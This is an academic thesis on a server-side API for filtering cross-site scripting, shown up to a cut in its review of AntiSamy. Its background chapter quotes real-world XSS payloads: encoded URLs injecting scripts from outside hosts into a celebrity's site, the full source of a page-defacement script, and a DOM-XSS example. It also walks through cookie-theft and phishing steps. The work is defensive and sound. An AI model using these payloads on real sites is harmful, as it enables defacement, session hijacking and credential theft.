server side api to secure xss - isea.nitk.ac.inisea.nitk.ac.in/publications/securexss.pdf · side...

SERVER SIDE API TO SECURE XSS

Thesis

Submitted in partial fulfillment of the requirements for the degree of

MASTER OF TECHNOLOGY in

COMPUTER SCIENCE & ENGINEERING - INFORMATION

SECURITY

by

KAMESH KUMAR BOGANATHAM

(07IS04F)

DEPARTMENT OF COMPUTER ENGINEERING

NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA

SURATHKAL, MANGALORE -575025

July, 2009

NATIONAL INSTITUTE OF TECHNOLOGY KARNATAKA, SURATHKAL ----------------------------------------------------------------------------------------------------

D E C L A R A T I O N

I hereby declare that the Report of the P.G. Project Work entitled “SERVER

SIDE API TO SECURE XSS” which is being submitted to National Institute of

Technology Karnataka Surathkal, for the award of degree of Master of Technology in

Computer Science and Engineering – Information Security in the Department of

Computer Engineering, is a bonafide report of the work carried out by me. The material

contained in this report has not been submitted to any university or Institution for the

award of any degree.

07IS04F, B KAMESH KUMAR

-----------------------------------------------------

(Register Number, Name and Signature of Student)

Department Computer Engineering

Place: NITK, SURATHKAL Date:

C E R T I F I C A T E

This is to certify that the P.G Project Work Report entitled “SERVER SIDE API TO

SECURE XSS” submitted by B KAMESH KUMAR (Reg.No. 07IS04F) as the record of

the work carried out by him, is accepted as the P.G Project Work Report Submission in

partial fulfillment of the requirements for the award of degree of Master of Technology in

Computer Science and Engineering – Information Security in the Department of

Computer Engineering, National Institute of Technology Karnataka, Surathkal.

External Guide

(Mr. Radhesh Mohandas )

Adjunct Faculty

Department of Computer Engineering

NITK Surathkal

Internal Guide

( Mr. Alwyn R Pais)

Senior Lecturer

Department of Computer Engineering

NITK Surathkal

Chairman- DPGC

DEDICATED TO

THEIR LORDSHIPS

SRI SRI RADHA VRINDAVANA CHANDRA

ACKNOWLEDGEMENTS

I take this opportunity to express my deepest gratitude and appreciation to all

those who have helped me directly or indirectly towards the successful completion of this

project.

First and foremost, I would like to express my sincere appreciation and gratitude

to my esteemed guides Mr. Radhesh Mohandas, Adjunct Faculty and Mr. Alwyn R

Pais, Senior Lecturer, Department of Computer Engineering, NITK Surathkal for their

insightful advice, encouragement, guidance, critics, and valuable suggestions throughout

the course of my project work. Without their continued support and interest, this thesis

would not have been the same as presented here.

I express my deep gratitude to Mr. K. Vinay Kumar, Asst. Professor and Head,

Department of Computer Engineering, National Institute of Technology Karnataka,

Surathkal for his constant co-operation, support and for providing necessary facilities

throughout the M.Tech program.

I would like to take this opportunity to express my thanks towards the teaching

and non- teaching staff in Department of Computer Engineering, NITK for their

invaluable help and support in these two years of my study. I am also grateful to all my

classmates for their help, encouragement and invaluable suggestions.

My special thanks to my parents, supporting family and friends who continuously

supported and encouraged me in every possible way for successful completion of this

thesis. I am forever indebted to you all.

B Kamesh Kumar

This Page is intentionally left blank

ABSTRACT

With Internet becoming ubiquitous in every aspect of our life, there is an increase in the

web applications providing day to day services like banking, shopping, mailing services, news

updates, etc. But most of these applications have vulnerabilities or security loopholes like Cross

site scripting (XSS), Cross-site request forgery (CSRF), SQL Injection which are being exploited

by the hackers for malicious purposes. Hence there is a need for API’s/automated security tools

to identify and/or prevent these vulnerabilities before the application goes live.

This work focuses on developing a server side API for Cross-site Scripting which

differentiates XSS attack from simple script. Thus novice users can enjoy the safe and better

experience of browsing without any surge of functionality, need of additional software or

configuration at browser side. Developing such API also reduces burden to web administrators to

safe guard their web applications from malignant XSS attacks.

Keywords: Web Applications, Cross-site Scripting (XSS), Cross-site Request forgery

(CSRF/XSRF), Server-side XSS Filter.

i

TABLE OF CONTENTS

Page No.

Title

Declaration

Certificate

Dedication

Acknowledgement

Abstract Table of contents i

List of figures iv

List of tables v

Nomenclature/Acronyms vi

Chapter I INTRODUCTION 1

1.1 Cross-site Scripting Attacks 2 1.2 Motivation 2 1.3 Organization of Thesis 3

Chapter II CROSS-SITE SCRIPTING 4

2.1 Introduction to Cross-site Scripting 4

2.2 A Basic Example 5

2.3 Malicious Code 5

2.4 Classification of Cross-site Scripting 9

2.4.1 Reflected XSS 9

2.4.2 Stored XSS 10

2.4.3 DOM – based XSS 10

2.5 Threats from Cross-site Scripting 11

ii

2.6 Cross-site Scripting and Phishing 12

2.6.1 Introduction to Phishing 12

2.6.2 Phishing Tricks 13

2.6.3 Cross-Site Scripting based Phishing Attack 14

2.7 Real World Examples 14

2.8 XSS Vs. CSRF 18

Chapter III EXISTING XSS DEFENSES 20

3.1 AntiSamy 21

3.2 The strip_tags() 24

3.3 PHP Input Filter 25

3.4 HTML_Safe/SafeHTML 25

3.5 Kses 26

3.6 htmLawed 28

3.7 Safe HTML Checker 28

3.8 HTML Purifier 29

3.9 Summary 29

Chapter IV PROBLEM STATEMENT 30

Chapter V DIFFERENTIATING XSS FROM SIMPLE SCRIPTS 31

Chapter VI IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS

39

6.1 Procedure 39

6.2 Implementation Details 40

6.3 Working of SecureXSS 41

6.4 Results 43

Chapter VII CONCLUSIONS 45

iii

REFERENCES 46

APPENDIX I OWASP The Ten Most Critical Web Application

Security Vulnerabilities

48

APPENDIX II Results of SecureXSS API 51

APPENDIX III Results of HTML Purifier 80

APPENDIX IV Simple HTML DOM Parser array 95

Resume (Bio-Data) 125

iv

LIST OF FIGURES

Fig. No. Descripton

Page No.

2.1 Sample PHP Code for Site Search Engines 6

2.2 Sample HTTP Response Page Containing the Tag 6

2.3 Cross-Site Scripting in Site Search Engines 7

2.4 Sample Malicious Code for Cookie Theft 7

2.5 An Attack Scenario of Cross-Site Scripting 8

2.6 Examples of Phishing Tricks 13

2.7 Cross-Site Scripting based Phishing Attack 15

2.8 Maria Sharapova’s Home Page 16

2.9 Defacement 18

6.1 Server-side XSS Filtering API 41

6.2 SecureXSS overhead 44

1 MITRE data on Top 10 web application vulnerabilities for 2006 48

v

LIST OF TABLES

Table No. Descripton

Page No.

3.1 Kses API’s 26

5.1 Tags and its attributes which are in favour of attackers 31

5.2 Extensions allowed 34

5.3 DOM Properties which will cause XSS attacks 37

6.1 SecureXSS timing test (overhead) results 43

1 OWASP Top 10 Web Application Vulnerabilities 49

2 Results of SecureXSS 51

3 Results of HTML Purifier 80

vi

Nomenclature/Acronyms

Notation Description

XSS Cross-site Scripting

OWASP Open Web Application Security Project

XSRF/CSRF Cross-site Request Forgery

PHP Hypertext Pre Processor

URL Uniform Resource Locator

URI Uniform Resource Identifier

HTML Hyper Text Markup Language

HTTP Hyper Text Transfer Protocol

1

CHAPTER 1

INTRODUCTION

With the proliferation of the Internet, there has been a surge in the web services being

offered by many corporations like e-banking, e-shopping, etc. As most of these applications are

not developed with best security practices, there is an increase in the malicious attacks against

these services, which exploits the vulnerabilities in these applications to acquire material gains or

to steal the credentials of the novice users who use these web services. This has resulted in more

research focus in this domain to create new tools and techniques to subvert these kinds of

attacks. There are many research groups in academics and industry working in this domain to

find out more secure programming practices and tools to identify the vulnerability of these

applications during development phase and attacks during the real time.

The OWASP Top 10 report [OWA] lists the following as the ten most critical web

application security vulnerabilities that are been exploited:

Cross Site Scripting (XSS)

Injection Flaws (SQL Injection, XPath Injection, LDAP Injection, etc)

Malicious File Execution

Insecure Direct Object Reference

Cross Site Request Forgery (CSRF)

Information Leakage and Improper Error Handling

Broken Authentication and Session Management

Insecure Cryptographic Storage

Insecure Communications

Failure to Restrict URL Access

In this work, we focused on Cross-site Scripting (XSS), which facilitates the hacker to

insert some malicious script to the web application that may cause any kind of harm to legitimate

user. In the process, we developed a server side XSS filtering API, which differentiates Potential

XSS attack from the simple XSS and strips it off. The main goal of this work is to provide a XSS

2

solution to web administrators to safe guard their applications from attackers, which results in

safe and better experience browsing to lame user without any surge in functionality.

1.1 Cross-site Scripting Attacks

Cross-site scripting attack method was first discussed in a CERT advisory back in 2000

[CER]. But, even today cross-site scripting (XSS) is one of the most common vulnerabilities in

web applications. It happens as a result of insufficient filtration of data received from a malicious

person and then sent to third parties. Systems that receive data from users and display it on other

users' browsers are very vulnerable to an XSS attack. Wikis, forums, chats, web mail - are all

good examples of applications most susceptible to XSS.

Cross-site scripting (XSS) can be defined as a security exploit in which an attacker inserts

malicious code into a page returned by a web server trusted by a user. This code may reside on

the web server or be explicitly inserted when the user browses to the particular web site, it may

contain JavaScript or just HTML, and it may use third party sites as sources or rely only upon the

resources of the targeted server. The XSS attacks typically involve JavaScript code from a

malicious web server executing on a user's web browser. Chapter 2 gives the brief knowledge

about XSS attack and its types with examples and illustration.

1.2 Motivation

In the last years, dynamic Web applications such as online banking systems and online

shops are becoming more and more popular. At the same time, security attacks that exploit Web

application vulnerabilities are increasing dramatically. Among such vulnerabilities, Cross-Site

Scripting is the most common security issue (as it is already said, it is the top most vulnerability

as per OWASP 2007 report), which enables attackers to steal credentials from a victim to gather

sensitive information or cause a Web site to be unavailable. To mitigate such serious impact,

Web applications should use an effective solution for Cross-Site Scripting flaws. Manual

security testing (for mitigation) is however both expensive and error prone due to the increasing

complexity of Web applications. Hence, automated tools for detecting Cross-Site Scripting flaws

are essential.

3

We have investigated some available solutions which claim to be state-of-the-art.

Unfortunately, most of them are not effective solutions as they fail in differentiating simple

scripts from potential XSS attack. Therefore, we have developed SecureXSS (pronounce as

Secure Excess), an open-source server-side filter for detecting and filtering Cross-Site Scripting

vulnerabilities in Web applications.

1.3 Organization of Thesis

The rest of the thesis is organized as follows. Chapter 2 gives the brief information about

XSS attack and its types with live examples and illustration. Chapter 3 deals with the available

solutions for XSS, while Chapter 4 describes the problem statement. Chapter 5 details our

solution to mitigate XSS which is called SecureXSS: Server-side XSS Filter. Chapter 6 gives the

implementation details and experimental results and Chapter 7 concludes the thesis along with

the future work, followed by the references used. Appendix I details the Top 10 most critical web

application vulnerabilities. Appendix II shows the results of SecureXSS API, while Appendix III

shows results of HTML Purifier and Appendix IV shows the Simple HTML DOM Parser Array.

4

CHAPTER 2

CROSS-SITE SCRIPTING

Cross-Site Scripting vulnerabilities are quite widespread. Just taking a look at the

Bugtraq mailing list, innumerable postings alarming Cross-Site Scripting holes are listed

regularly. As mentioned in the introduction chapter, Cross-Site Scripting vulnerabilities are the

most common security loopholes found in over 80 percent of Web sites. Hence, the likelihood

that a Web site is XSS vulnerable is extremely high. According to the Information-Technology

Promotion Agency (IPA), from July 2004 to September 2005, attacks using Cross-Site Scripting

are the most serious issue among all Web application attacks (was accounted for 42%), while

SQL Injection is ranked second with 16%. Thus, it is imperative to make Web applications

secure against XSS attacks.

In this chapter, we start by briefly explaining the XSS problem with a basic example, and

then we give an introduction to malicious code and how XSS attacks work. After presenting the

classification of XSS, we describe the risks that XSS may cause.

2.1 Introduction to Cross-site Scripting

As introduced in the previous chapter, Web applications are becoming not only

increasingly popular, but also more and more vulnerable. Attack techniques exploiting various

types of Web application vulnerabilities are becoming more and more sophisticated. A particular

class of these attack techniques is referred to as Cross-Site Scripting (or HTML Code Injection),

which takes advantage of the failure of Web applications, that do not validate user input before

displaying it back to the user. Such attacks involve commonly three parties: the user (victim), the

attacker, and the website, which is XSS vulnerable. The attacker uses the poorly designed

legitimate website as a vehicle to execute malicious code (as it was originated from a trusted

source) in the user’s browser.

As explained above, XSS attacks occur when an attacker uses a web application to send

malicious code (generally in the form of a browser side script,) to a different end user. Flaws that

allow these attacks to succeed are quite widespread and occur anywhere in a web application, it

5

uses input given by user in the output it generates, without validating or encoding it. An attacker

can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no

way to know that the script should not be trusted, and will execute the script. Because it thinks

the script came from a trusted source and have the malicious script can access cookies, session

tokens, or other sensitive information retained by your browser and used with that site. These

scripts can even rewrite the content of the HTML page [XSS].

2.2 A Basic Example

Most web applications contain site search engines. Such site search engines usually

display the results on the screen together with the search phrase entered by users. As an example

consider the PHP code shown in figure 2.1, in which the text after “Search results for” is

generated dynamically according to the user input. When the search phrase (user input) is not

sanitized properly, Cross-Site Scripting may occur which can also be an attack. As illustrated in

figure 2.3 (a), after clicking on the search button, we get the search phrase entered in the form

field (here search text) displayed in the response page, regardless of the search results. We

experiment now with HTML tags, as illustrated in figure 2.3 (b), the search phrase returned (here

Hello World) is formatted as bold, instead of displaying the text we entered (Hello World

embedded in the HTML tag ). Besides displaying the formatted search phrase, we can also

cause JavaScript code to be executed in the browser (most browsers enabled JavaScript by

default). As illustrated in figure 2.3 (c), in place of showing the search phrase, a JavaScript alert

box with the text XSS Vulnerability popped up. It is for the reason that browser interprets the

search phrase we entered as HTML tag instead of text. In the sample HTTP response page shown

in figure 2.2, the tag introduces a JavaScript program and thus it is not displayed by

the browser.

2.3 Malicious Code

Considering the example above, one may ask, it just throws up an alert box, how dangerous can

it be? Right, alert pop ups are annoying; however they do not really cause security issues. We

just use it to demonstrate that a Web application is vulnerable to XSS. If the JavaScript alert

function can be executed, there is commonly no reason that other JavaScript functions containing

malicious code cannot succeed.

6

Figure 2.1: Sample PHP Code for Site Search Engines

Figure 2.2: Sample HTTP Response Page Containing the Tag

(a) Search for a Simple Text

(b) Search for a Formatted Text

7

(c) Search for an Executable Script

Figure 2.3: Cross-Site Scripting in Site Search Engines

Attackers exploit XSS vulnerabilities in order to execute the injected malicious code.

What on earth does malicious code mean? Which impact may it cause? Next, we will give an

introduction to malicious code.

Most Web browsers are able to run scripts embedded in Web pages downloaded from a

Web server by default. Such scripts are usually written in various scripting languages such as

JavaScript and VBScript, which are introduced by the HTML scripting tag . In

addition to the scripting tags, many other HTML tags (like tag) can be misused to load

malicious code.

Malicious code is able to rewrite an HTML page with fraudulent content, or redirect the

client’s browser to the page of attackers; it can even access authentication cookies, session

management tokens, or other sensitive information. With this information, an attacker is able to

hijack the victim’s active session and thus, bypass the authentication process completely.

Consider the script in figure 2.4, when this script is injected into a page of the site (e.g.

www.xss.site) successfully and a victim’s browser loads this page, the embedded script will be

executed and store the victim’s cookie from this site. Now, the attacker is able to access the

victim’s account and masquerade himself as the victim. (Figure 2.5 illustrates this scenario)

Figure 2.4: Sample Malicious Code for Cookie Theft

8

Figure 2.5: An Attack Scenario of Cross-Site Scripting

Steps shown in the Figure 2.5 is explained below in details.

(1) A user logs in a XSS vulnerable site.

(2) The site sets cookies (e.g. ID=123) to the user, which is saved in the browser.

(3) An attacker knows that the site displays a parameter without validating (e.g. the parameter

“name”), he constructs a link with the malicious code described in figure 2.4 and tricks the user

into clicking on this link.

(4) The unsuspecting user clicks on the link and an HTTP request containing the malicious code

from the attacker is sent to the XSS vulnerable site.

(5) According to the request, the site generates response page having malicious code embedded

and displays this page to the user.

9

(6) While user views the response page, the malicious code gets executed in the user’s browser,

cookies of that web site are sent to the attacker.

(7) The attacker has now access to the user’s account and can masquerade himself as the user.

The possible sources of malicious code include URL query string, HTML form fields,

HTTP headers and cookies, etc. Since malicious code is embedded in the user’s trusted websites,

it is allowed to perform dangerous operations smoothly. Websites using SSL are not more

protected against malicious code than those general websites. SSL only encrypts data (including

the malicious code) transmitted in the connection, it does not attempt to validate data. Therefore,

XSS attacks can be achieved as usual, except that they occur in an encrypted connection.

2.4 Classification of Cross-site Scripting

Generally, Cross-Site Scripting attacks can be classified into three categories: Reflected

(non-persistent), Stored (persistent) and DOM - based. Before we describe these three categories,

we should learn about DOM, to understand the third type of XSS.

The Document Object Model (DOM) is a cross-platform and language-independent

convention for representing and interacting with objects in HTML, XHTML and XML

documents. Objects under the DOM (also sometimes called "Elements") may be specified and

addressed according to the syntax and rules of the programming language used to manipulate

them. In simple terms, the Document Object Model is the way JavaScript sees its containing

HTML page and browser state. Next, we will describe these three categories respectively.

2.4.1 Reflected XSS

Reflected XSS (also referred to as non-persistent XSS) is by far the most common type,

which implicates that after a request, the page containing malicious code is returned to the Web

browser immediately.

Normally, a non-persistent XSS attack requires deceiving a user into visiting a specially

manipulated URL with embedded malicious code using social engineering techniques. When a

user is tricked into clicking on the malicious link, it causes the code embedded in the URL to be

executed in the Web browser, and the attack is achieved.

10

2.4.2 Stored XSS

In contrast to reflected XSS, stored XSS (also referred to as persistent XSS) implicates

that when the malicious code is injected to a website; it is stored (in a database or XML files)

over a longer period, and displayed to users in a webpage later. This kind of XSS is more serious

than other types, because an attacker can inject malicious code just once, and affect a large

number of unsuspecting users, it is even hardly necessary for attackers to trick the users into

clicking on a link containing malicious code. For example, if the malicious code is stored in a

database, without clicking on any link, the innocent user may become victim by just viewing the

page that contains the stored malicious code.

There is another kind of stored XSS that uses techniques to manipulate user’s cookies.

With such techniques, attackers are able to tamper the cookie content with malicious code and

cause the code to be executed each time when the user visits the website.

Examples of web applications, which are especially vulnerable by stored XSS, often

include discussion forums, guest books, webmail systems, etc. RSS feeds that are popularly used

in web blogs, news sites can also be used as vehicle to achieve such attacks.

Here is the real world example of a persistent XSS attack that occurred on the most

popular online auction website eBay. As reported by US-CERT16 in April 2006, when an eBay

user posts an auction, tags are allowed to be included in the auction description,

which creates a XSS vulnerability in the eBay Web site. Attackers are exploiting this

vulnerability to redirect auction viewers to a fake eBay login page that requests login information

to steal credentials [USC].

2.4.3 DOM – based XSS

Besides the XSS attacks described above, which are considered as standard XSS, there is

also a third kind of XSS attack, namely, DOM-based XSS. Unlike the standard XSS attacks,

which rely on the dynamic web pages, a DOM-based XSS attack does not require sending

malicious code to the server necessarily and thus can also use static HTML pages.

11

The problem is addressed in the client-side script (i.e. JavaScript) within a page itself,

which retrieves data from certain DOM objects without encoding the URL characters. The DOM

objects mentioned here include:

- document.location - document.URL - document.referrer

We make this clear by means of a simple example. Assuming that the following script

resides within a HTML page, this script displays the text retrieved from the current URL

somewhere in the page.

document.write(document.URL);

When we enter the following URL into the address bar in a browser, we will get an alarm

box with the text “XSS”, thus it results in XSS hole.

http://www.xss.site/index.html#alert("XSS")

2.5 Threats from Cross-site Scripting

Some of the common threats from XSS attacks are listed below:

Cookie theft and account hijacking: one of the most severe XSS attack involves cookie

theft and account hijacking as the scenario illustrated previously in figure 2.5. Credentials

stored in cookies can be stolen by attackers, thus it is possible for attackers to steal user’s

identity and access his confidential information. For normal users, this means that their

personal data such as credit card information or bank account may be misused. For users

having high privileges such as administrators, if their accounts are stolen via XSS,

attackers are able to access the web server and the backend database system, and thus

have the full control of the web application.

Misinformation: another critical threat from XSS is the danger of credentialed

misinformation. XSS attacks may include malicious code, which can spy on user’s surf

behavior and thus gain statistics (i.e. logging user’s clicks or history of sites visited).

Consequently, it results in loss of privacy. Another kind of misinformation is that

12

malicious code is able to modify the presentation of page content, once it is executed in a

browser. This enables an attacker to manipulate a press release or important news, even

to alter the stock price of companies, which results in loss of integrity. Malicious script

may also modify the login page, together with Phishing; a victim may submit his login

information to the attacker unconsciously.

Denial of Service: In view of an enterprise, it is imperative that their Web applications

are should be accessible all the time. However, malicious script can lead to loss of

availability. For example, it can redirect users’ browser to other websites. The spread of

the XSS worm on Myspace.com described previously is another example of a Denial of

Service attack. In view of users, malicious script can also make a user’s browser crash or

become inoperable (i.e. by throwing infinitely many alert boxes), so that the user cannot

reach the Web application any more.

Browser exploitation: malicious script can redirect client browsers to an attacker’s site,

so that the attacker is able to take advantage of specific security hole in web browsers to

control users’ computer by executing arbitrary commands, such as to install Trojan horse

programs on the client or upload local data containing sensitive information.

2.6 Cross-site Scripting and Phishing

This part of the thesis will give a brief explanation about phishing kind of cross site

scripting. Section 2.6.1 Will give introduction about phishing and Section 2.6.2 will explain some

tricks of the phishing, while Section 2.6.3 explains cross-site scripting based phishing attacks.

2.6.1 Introduction to Phishing

Phishing (as in fishing for sensitive data), is the act of tricking someone into giving them

sensitive information like credit card numbers, passwords, bank account information, or other

personal data using social engineering techniques [STA, OLL].

Phishing uses usually emails as medium, which look like coming from banks, ask users to

log into their online-banking system, or change their password, or input their credit card number.

In the last years, Phishing has become a major issue, according to the Pew Study [PEW], in

13

October 2005, more than a third of email users suffered Phishing, and two percent have

responded by providing personal financial information.

(a) Similar or Misspelled Domain Names

(b) URL Hex Encoding

(c) Using HTML Coding to Hide the Real Link

Figure 2.6: Examples of Phishing Tricks

2.6.2 Phishing Tricks

Tricks commonly used for Phishing include:

Similar or misspelled domain names (see figure 2.6(a)). Phisher’s may also substitute the

lowercase of “L” with the uppercase of “I”, because they are hard for the users to

distinguish.

Using encoded URL. These tricks are used to encode the URL to disguise its true value

by using Hex, Unicode, or UTF-8 encoding. An example of Hex Encoding is illustrated

in figure 2.6(b).

Using HTML coding to hide the real link (see figure 2.6(c)). The real link is not directly

visible to the user. As soon as he clicks the link, he is taken to the fake site of the attacker

instead of the site indicated.

Using fake banner advertising. Phisher’s can use copied banner advertising and publish it

on the Internet. Similar to the example above, the destination is linked to the fake site,

and it is not directly visible to the users.

14

2.6.3 Cross-Site Scripting based Phishing Attack

The Phishing tricks described above misdirect users to fake sites. But if the Phishing site

is the real site, this kind of Phishing attack is more dangerous, since users trust the real site. Such

attacks can be achieved, when a site is XSS vulnerable. The example below will demonstrate

sample of this attack.

For a Cross-site Scripting based Phishing attack; the following steps should be taken:

1. Finding Cross-site Scripting vulnerabilities in a site.

2. Embedding malicious content into a fraudulent email. Attacker could use encoded URL

to obfuscate the true destination.

3. Sending the spoofed email to victims.

When a user clicks the link in the spoofed email, the login part of the page returned is

replaced with the fake login page from the attacker’s site, other contents of the page and the

address bar remain unchanged. The user is not aware of this and logs in with his personal

information, which will be sent to the attacker. After login, the user will be redirected back to the

real site. Figure 2.7 illustrates this scenario.

XSS based Phishing attacks can bypass the traditional Phishing defenses such as

blacklists, SSL notices, etc. The first step to achieve XSS based Phishing attack is to find XSS

vulnerabilities in an insecure Web site.

2.7 Real World Examples

On April 1, 2007, there was an interesting prank on Maria Sharapova’s (the famous Tennis

player) home page (Figure 2.8). Apparently someone has identified an XSS vulnerability, which

was used to inform Maria’s fan club that she is quitting her carrier in Tennis to become a CISCO

CCIE Security Expert.

The URL that causes the XSS issue looks like the following:

15

http://www.mariasharapova.com/defaultflash.sps?page=//%20--

%3E%3C/script%3E%3Cscript%20src=http://www.securitylab.ru/upload/story.js%3E%3C/scri

pt%3E%3C!--&pagenumber=1

Figure 2.7: Cross-Site Scripting based Phishing Attack

16

Notice that the actual XSS vulnerability affects the page GET parameter, which is also

URL-encoded. In its decoded form, the value of the page parameter looks like this:

// --> comments out everything

generated by the page up until that point. The second part of the payload includes a remote script

hosted at www.securitylab.ru. And finally, the last few characters on the URL make the rest of

the page disappear.

Figure 2.8 Maria Sharapova’s Home Page

The script hosted at SecurityLab has the following content:

document.write("Maria Sharapova"); document.write("Maria Sharapova is glad to announce you her new decision, which changes her all life for ever. Maria has decided to quit the carrier in Tennis and become a Security Expert. She already passed Cisco exams and now she has status of an official CCIE.

Maria is sure, her fans will understand her decision and will respect it. Maria already accepted proposal from DoD and will work for the US government. She also will help Cisco to investigate computer crimes and hunt hackers down.

17

Let’s have a look at the following example provided by RSnake from ha.ckers.org.

RSnake hosts a simple script (http://ha.ckers.org/weird/stallowned.js) that performs XSS

defacement on every page where it is included. The script is defined like this:

var title = "XSS Defacement"; var bgcolor = "#000000"; var image_url = "http://ha.ckers.org/images/stallowned.jpg"; var text = "This page has been Hacked!"; var font_color = "#FF0000"; deface(title, bgcolor, image_url, text, font_color); function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) { document.title = pageTitle; document.body.innerHTML = ''; document.bgColor = bgColor; var overLay = document.createElement("div"); overLay.style.textAlign = 'center'; document.body.appendChild(overLay); var txt = document.createElement("p"); txt.style.font = 'normal normal bold 36px Verdana'; txt.style.color = fontColor; txt.innerHTML = pageText; overLay.appendChild(txt); if (image_url != "") { var newImg = document.createElement("img"); newImg.setAttribute("border", '0'); newImg.setAttribute("src", imageUrl); overLay.appendChild(newImg); } var footer = document.createElement("p"); footer.style.font = 'italic normal normal 12px Arial'; footer.style.color = '#DDDDDD'; footer.innerHTML = title; overLay.appendChild(footer); }

In order to use the script we need to include it the same way we did when defacing Maria

Sharapova’s home page. In fact, we can apply the same trick again. The defacement URL is:

http://www.mariasharapova.com/defaultflash.sps?page=//%20--

%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script

%3E%3C!--&pagenumber=1

The result of the defacement is shown on Figure 2.9. Website defacement, XSS based or

not, is an effective mechanism for manipulating the masses and establishing political and non-

political points of view. Attackers can easily forge news items, reports, and important data by

using any of the XSS attacks. It takes only a few people to believe what they see in order to turn

something fake into something real.

18

Examples explained here are taken from [JEG], refer the same for many more real world

XSS attacks and examples.

Figure 2.9 Defacement

2.8 XSS Vs. CSRF

Cross-Site Scripting (XSS) and Cross-site Request Forgery (CSRF) attacks are frequently

confused as they are clearly related [RRO]. Both attacks are aimed at the user and often require

the victim to access a malicious web page. Also the potential consequences of the two attack

vectors can be similar: The attacker is able to submit certain actions to the vulnerable web

application using the victim's identity. The causes of the two attack classes are different though.

A web application that is vulnerable to XSS fails to properly sanitize user provided data before

including this data on a webpage, thus allowing an attacker to include malicious JavaScript in the

web application. This JavaScript consequently is executed by the victim's browser and initiates

the malicious requests. XSS attacks have more capabilities beyond the creation of http request

and are therefore more powerful than CSRF attacks. A rogue JavaScript has almost unlimited

power over the webpage it is embedded in and is able to communicate with the attacker. As an

example, XSS can obtain and leak sensitive information.

Cross Site Scripting (XSS) exploits the trust that a client has for the website or

application. Users generally trust that the content displayed in their browsers is same as that it is

19

intended to be displayed by the website being viewed. In contrast, CSRF exploits the trust that a

site has for the user. The website assumes that if an 'action request' was performed, it believes

that the request is being sent by the user [ROB].

An attacker exploits a lack of input and / or output filtering in the case of XSS flaw.

Filtering out the dangerous characters like , “, ‘, &, ;, or # in an application could resolve the

XSS flaw. XSS is related to the application performing insufficient data validation. XSS flaws

may allow bypassing of any CSRF protections by leaking valid values of the tokens, allowing

Referrer headers to appear to be an application itself, or by hosting hostile HTML and JavaScript

elements right in the target application. Therefore resolving XSS flaws should be given priority

over CSRF weaknesses [CSRF].

XSS aimed at inserting active code in an HTML document to either abuse client-side

active scripting holes, or to send privileged information (e.g. authentication/session cookies) to a

attacker controlled site. CSRF does not in any way rely on client-side active scripting, and its

aim is to take unwanted, unapproved actions on a site where the victim has some prior

relationship and authority.

Where XSS sought to steal the online trading cookies so an attacker could manipulate the

victim’s portfolio, CSRF seeks to use the victim’s cookies to force the victim to execute a trade

without his knowledge or consent.

20

CHAPTER 3

EXISTING XSS DEFENSES

There is dire need for web applications to provide users with the ability to format their

profile or postings using Hypertext Markup Language / Cascading Style Sheet (HTML/CSS). To

attain that functionality, developers must allow users to provide their own source code directly or

give the user an intermediate language with which the user can work.

As the simple solutions, there are many lightweight markup languages apart from HTML

available like BBCode [BBC], Wikitext [WIT], Markdown [MAD], Textile [TEX], WYSIWYG,

which will be parsed by message board system before being translated to markup language that

web browsers understand (can be HTML or XHTML).

An example intermediate language code for rendering green text can be shown below.

[color=green]Sample Text[/color]

After translation the above code would be rendered to the user’s browser in the target

language, HTML/CSS as seen below

Sample Text

This is a safe approach in general because it does not allow users to specify arbitrary

target language code which can be obfuscated and disguised using various encoding and

fragmenting techniques. By providing an intermediate language and interpreting it in a top-down

fashion the application can only render the subset of HTML functionality that they wish to

interpret.

There is a practical problem with this approach. The user will be fairly limited in

formatting code because of limited instruction set provided by the web application is unlikely to

ever be as complete as the HTML/CSS specifications. However the attributes/ values provided

with the attributes in any of these markup languages are not vulnerable, still they face problems

related to the way they translate the unknown markup language into secure HTML/XHTML (i.e.,

the translated HTML cannot be secure).

21

The other option when providing formatting capability is to allow users to input

HTML/CSS directly. If user’s input cannot be trusted, it is imperative that the application be able

to detect and remove any malicious code. To detect and remove such malicious code, there are

some solutions developed. In this Chapter we’ll see such solutions one by one in detail.

3.1 AntiSamy

The primary focus of developers while developing AntiSamy [ANT] (in reference to

Samy Kamkar’s now infamous MySpace XSS worm.) is to create a XSS filter that works on a

positive and customizable security model. The secondary focus was to make this tool as user

friendly as possible so as to allow applications using it to communicate to the user how their

input was filtered or how they could tune it themselves in order to accommodate a more

successful filter.

AntiSamy first sanitizes the user given input using NekoHTML to avoid false positives

because of unbalanced start or end markers. NekoHTML is a Java API that transforms unbroken

of any version into clean XHTML 1.0, which is also standalone of its kind.

The main validation processing takes place in a depth-first fashion. Starting with the root,

each node is processed according to the specifications inside the security model XML file given

with the node name (e.g., html or input). There are three modes of validation (also called

processing actions): filter, truncate and validate and they are each described in the following

section.

Filter

The filter processing action performs no validation per se, but only removes the start and

end tags, promoting the tag’s contents. This sanitization is useful in many cases. For example, if

you decided you wouldn’t like users to input meta tags that could mess with your robot indexing,

setting filter would have the effect demonstrated below.

User Input: This is some text.

Output after Filtering: This is some text.

22

Truncate

When the truncate processing action is set, no actual validation takes place. The truncate

action simply removes all the attributes and child nodes of a tag, making validation of its

attributes unnecessary. A number of tags should be set to truncate.

User Input:
Output after Truncating:

Many formatting tags are set to truncate in the default policy file, including em, small,

big, i, b, u, center, pre and more.

Validate

The validate processing action is where the meat of the filtering logic resides. If there are

no attributes defined for a tag by the policy file, the validate processing action will act the same

as the truncate processing action, except the child nodes will be validated instead of removed.

The validate action steps through each of the attributes in the tag to be filtered and checks

if there is a corresponding entry for that tag and attribute combination in the policy file. If no

entry is found, the attribute is simply removed. If there is an entry, the filter tries to validate its

value against the rules in the entry.

There are two ways for an attribute value to be validated; by being equal to a literal string

value or by the matching of a regular expression. Accordingly, each attribute’s definition in the

policy can have a list of valid literal strings and a list of regular expressions to match. This is a

departure from other XSS filters (and other security tools, in general) that don’t allow for

multiple ways to specify valid values, which force the user into writing overly complex (and

likely incomplete or unpredictable) regular expressions.

When an attribute does not pass a validation check, one of a few onInvalid actions is

taken. The possible onInvalid actions dictate what to do with the tag and its contents. The set of

23

onInvalid actions includes removeTag, filterTag and removeAttribute. The default action is

removeAttribute.

If an attribute with the removeTag set for its onInvalid action fails validation, the tag

